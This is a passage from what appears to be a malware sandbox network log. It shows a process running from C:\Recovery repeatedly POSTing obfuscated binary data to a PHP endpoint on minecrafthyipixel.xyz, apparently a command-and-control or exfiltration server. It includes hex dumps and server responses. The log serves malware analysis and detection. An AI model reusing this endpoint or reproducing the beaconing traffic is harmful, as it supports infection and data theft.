                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 59 30 25 2a 14 35 2a 06 04 3e 30 3a 13 2a 0e 21 5c 2a 07 35 16 23 2e 37 0e 38 03 24 5a 3c 05 00 5f 31 33 3e 0b 27 3e 38 53 31 0a 21 59 00 1a 39 5f 23 3c 3d 5b 2d 5f 2e 02 2b 1f 0f 5e 34 0b 27 14 3f 2e 3d 52 21 28 2c 06 3c 2d 29 53 2d 28 2c 57 28 16 26 06 3b 34 25 00 22 11 2c 52 09 12 26 0b 2b 28 06 5b 26 20 0b 1d 23 31 2f 00 28 3c 32 59 24 5d 2c 1f 25 20 24 5f 2d 22 0c 55 32 2e 21 56 3d 29 2c 1e 37 2f 3d 14 31 3e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$Y0%*5*>0:*!\*5#.78$Z<_13>'>8S1!Y9_#<=[-_.+^4'?.=R!(,<-)S-(,W(&;4%",R&+([& #1/(<2Y$],% $_-"U2.!V=),7/=1>.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:49.632580042 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    119 | 192.168.2.4 | 49870 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:49.453049898 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:49.557626963 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:49.557785034 CEST | 2512 | OUT | Data Raw: 52 5a 5e 54 5c 41 51 58 5c 5e 59 59 57 54 58 59 54 5b 5f 5e 54 55 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^T\AQX\^YYWTXYT[_^TUSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&X2U"+(X038%;?;#2(%+!7=)#7/3:$[. X )
                                                                                                                                    Apr 19, 2024 13:43:49.818070889 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=snQEkAB71uX0E%2B2%2B0XeKY2doGKEmUXwg1zDl6JqryfJBjOxHOpLg3eDuRKzx0TJAaAK%2BVuBTIHRPymWToVzWpjYl%2BYPmSRz3xkqXOA7ZtfN14ceQ71TELOd2mXrOwfrGHsxUgrWvtps%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca39e6bd7ada4-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:49.818130970 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    120 | 192.168.2.4 | 49871 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:50.047776937 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:50.154071093 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:50.154275894 CEST | 2512 | OUT | Data Raw: 57 5a 5b 5b 59 42 51 58 5c 5e 59 59 57 56 58 53 54 56 5f 5d 54 5f 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[[YBQX\^YYWVXSTV_]T_SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z2!!+4Z$3+'-W>;\'*'2;>R!1"W>+#?,\9$[. X !
                                                                                                                                    Apr 19, 2024 13:43:50.525952101 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:50 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f7jwgWDRwFCPcRdGAda16iDa15PyBHQ44cxX9o4cpuWK8LVaZUSljuW45T3XwcB651WIQb%2FO%2BsC3fr3UelonatJ5x1uhqEP4aJ21ZT1KHpyTqrH0yZdT5VlyudgMrVjxP94oHlIVx8k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3a229d08bb7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:50.526015043 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    121 | 192.168.2.4 | 49872 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:50.773601055 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:50.878026962 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:50.878290892 CEST | 2512 | OUT | Data Raw: 52 5f 5e 5b 59 44 54 5e 5c 5e 59 59 57 50 58 5f 54 5a 5f 57 54 5e 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_^[YDT^\^YYWPX_TZ_WT^SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%['-=!8 X038%;1W)%9(R285 !>T)(;_",0^/5$[. X
                                                                                                                                    Apr 19, 2024 13:43:51.151772022 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:51 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLKtkSnrCXA1DqO72vmrYpjs67tILBKwstd2SCNvxcWvHeeNkxDsUncnhjHMIJsjvARCPp1Z6KLqgh5LwC1%2Ba7nlcp5znW3Q%2FKnWg3fQ%2BPveyOz3b5KFFmqvmlTe8%2BmNIp%2BUOHqh4qk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3a6ade4451a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:51.151835918 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    122 | 192.168.2.4 | 49873 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:51.372816086 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:51.477639914 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:51.479341030 CEST | 2512 | OUT | Data Raw: 57 5a 5e 58 5c 43 54 5b 5c 5e 59 59 57 52 58 5a 54 50 5f 5d 54 5f 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^X\CT[\^YYWRXZTP_]T_SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&X"S";,X0;^$.)<19?%+67*V*;^4_.5$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:51.855530977 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:51 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POuLXVj5G8qm8Y7X3hhnVUP%2BmiaOz2u8sCpHboiRStQ5rM0phBk6WSvbdeoL87qhxwFOtTjtiWfne0jh%2BuFrwS%2F1Qhzb7FVZucks7TRnh4zjUxbplxP5VfzRjUFFCFkbZEw7Ka2s7Mo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3aa6ef26759-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:51.855607033 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    123 | 192.168.2.4 | 49874 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:52.075906992 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:52.180644989 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:52.180787086 CEST | 2512 | OUT | Data Raw: 57 5b 5e 5d 5c 47 51 5e 5c 5e 59 59 57 52 58 5f 54 54 5f 5d 54 5d 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^]\GQ^\^YYWRX_TT_]T]S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_&U"8<\0043.=$%_ S&4!==;\#<.%$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:52.539894104 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:52 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2NU82Pl6btwkHWJmE%2FpYCuOAD5mzYdsxbKL%2B5sB6pf0jJjuuxwW4iP2PWGUuq4Wbm7wwdBumsDIZfhEZNEaoy627vTArLt%2BeHjqWEQQf50BHf2J8w2X%2BPVK9r6R2avOOkb0VmKDfKk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3aec81b672b-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:52.539927006 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    124 | 192.168.2.4 | 49875 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:52.770729065 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2500
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:52.880300045 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:52.880613089 CEST | 2500 | OUT | Data Raw: 57 54 5e 54 5c 46 51 59 5c 5e 59 59 57 57 58 5b 54 55 5f 5e 54 55 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^T\FQY\^YYWWX[TU_^TUSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&-. ;$08'("?+7\%#&]2P71>T*']#3-5$[. X =
                                                                                                                                    Apr 19, 2024 13:43:53.159071922 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QpQOuPetr%2BV6vIUJI64jKaBgfoccKLM6wJqLXdhI%2FUrRBWGaKazkY8RtGBRz03jZ%2F89GJMSwFf%2BAtvr2srtjtYFS5bgWIDW6VYipv69j3%2BeRGkIelU1iAC9Caai%2B0qyIJKsHijofKyg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3b329a34594-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:53.159133911 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    125 | 192.168.2.4 | 49876 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:53.393157959 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:53.498394012 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:53.498696089 CEST | 2512 | OUT | Data Raw: 57 55 5b 5f 5c 47 51 58 5c 5e 59 59 57 5e 58 5c 54 56 5f 5f 54 59 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[_\GQX\^YYW^X\TV__TYSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]2>&!8Y$V<3)Q=+&)0U%])711*#^#,+.$[. X
                                                                                                                                    Apr 19, 2024 13:43:53.756548882 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TOldseVmmnhAg%2B1fcD7DXeJyZOeB3tOeolwG%2FBT5gJ%2BS029Jgq5vXyq2NM7eGclMhpjXh8fOifWBmaFPoip1JsRIpx9mle74oupeo2EDUhgSmZubB62%2FVyy%2FzaWi9pCM49dlPFpNx4Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3b70bf744e1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:53.756614923 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    126 | 192.168.2.4 | 49877 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:54.271435976 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:54.375962973 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:54.376197100 CEST | 2512 | OUT | Data Raw: 57 5f 5b 5c 59 44 54 54 5c 5e 59 59 57 52 58 58 54 54 5f 5b 54 5a 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[\YDTT\^YYWRXXTT_[TZS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_%X6U";('3[0(-T=(%1;"W!2!++<"<8^:$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:54.642930031 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:54 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKV%2BHaINbVVdc9O4qhhQFgmhYvwpau8R9ncqDZ2ORhbu82fWkYAP4xuP6bK6ObNIN%2BiFHUtzbijVGH1ghBl8Y99u0e59Tp4I1PYLfQDtHOlqop1gyY77Ne%2BTQZ3pAYfFSrjx84G%2Bu6k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3bc8c774505-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:54.642992973 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    127 | 192.168.2.4 | 49879 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:56.162867069 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:56.267267942 CEST | 25 | IN | HTTP/1.1 100 Continue
